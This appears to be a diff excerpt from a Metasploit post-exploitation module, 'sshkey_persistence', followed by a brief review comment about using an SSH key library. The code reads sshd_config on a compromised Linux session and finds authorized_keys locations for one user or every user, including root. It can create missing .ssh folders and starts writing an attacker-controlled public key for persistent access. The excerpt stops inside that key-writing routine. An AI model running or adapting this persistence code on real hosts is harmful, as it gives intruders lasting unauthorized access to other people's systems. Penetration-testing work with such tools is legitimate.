modules/post/linux/manage/sshkey_persistence.rb

```diff
@@ -0,0 +1,143 @@
+        'Author'         =>
+          [
+            'h00die <mike@shorebreaksecurity.com>'
+          ],
+        'Platform'       => [ 'linux' ],
+        'SessionTypes'   => [ 'meterpreter', 'shell' ],
+        'Targets'        =>
+          [
+            [ 'Automatic', {} ]
+          ],
+        'DefaultTarget'  => 0
+        # 'DisclosureDate' => "Jul 1 2015",
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('username', [false, 'User to add SSH key to (Default: all users on box)' ]),
+        OptPath.new('PubKey', [false, 'Public Key File to use. (Default: Create a new one)' ]),
+        OptString.new('sshd_config', [true, 'sshd_config file', '/etc/ssh/sshd_config' ]),
+        OptBool.new('CreateSSHFolder', [true, 'If no .ssh folder is found, create it for a user', false ])
+      ], self.class
+    )
+  end
+
+  def run
+    if session.type == "meterpreter"
+      sep = session.fs.file.separator
+    else
+      # Guess, but it's probably right
+      sep = "/"
+    end
+    print_status('Checking SSH Permissions')
+    sshd_config = read_file(datastore['sshd_config'])
+    /^PubkeyAuthentication[\s]+(?<pub_key>yes|no)/ =~ sshd_config
+    if pub_key && pub_key == 'no'
+      print_error('Pubkey Authentication disabled')
+    elsif pub_key
+      vprint_good("Pubkey set to #{pub_key}")
+    end
+    /^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%\/\.]+)/ =~ sshd_config
+    if auth_key_file
+      auth_key_file = auth_key_file.gsub('%h', '')
+      auth_key_file = auth_key_file.gsub('%%', '%')
+      if auth_key_file.start_with? '/'
+        auth_key_file = auth_key_file[1..-1]
+      end
+    else
+      auth_key_file = '.ssh/authorized_keys'
+    end
+    print_status("Authorized Keys File: #{auth_key_file}")
+
+    auth_key_folder = auth_key_file.split('/')[0...-1].join('/')
+    auth_key_file = auth_key_file.split('/')[-1]
+    if datastore['username'].nil?
+      print_status("Finding #{auth_key_folder} directories")
+      paths = enum_user_directories.map { |d| d + "/#{auth_key_folder}" }
+    else
+      if datastore['username'] == 'root'
+        paths = ["/#{datastore['username']}/#{auth_key_folder}"]
+      else
+        paths = ["/home/#{datastore['username']}/#{auth_key_folder}"]
+      end
+      vprint_status("Added User SSH Path: #{paths.first}")
+    end
+
+    if datastore['CreateSSHFolder'] == true
+      vprint_status("Attempting to create ssh folders that don't exist")
+      paths.each do |p|
+        unless directory?(p)
+          cmd_exec("mkdir -p #{p}")
+          print_status("Creating #{p} folder")
+        end
+      end
+    end
+
+    paths = paths.select { |d| directory?(d) }
+    if paths.nil? || paths.empty?
+      print_error("No users found with a #{auth_key_folder} directory")
+      return
+    end
+    write_key(paths, auth_key_file, sep)
+  end
+
+  def write_key(paths, auth_key_file, sep)
+    if datastore['PubKey'].nil?
+      key = SSHKey.generate
```

Comment:
I went w/ sshkey since other module(s) used it, for consistency.  Also makes life slightly easier code wise than running a command line argument to make the key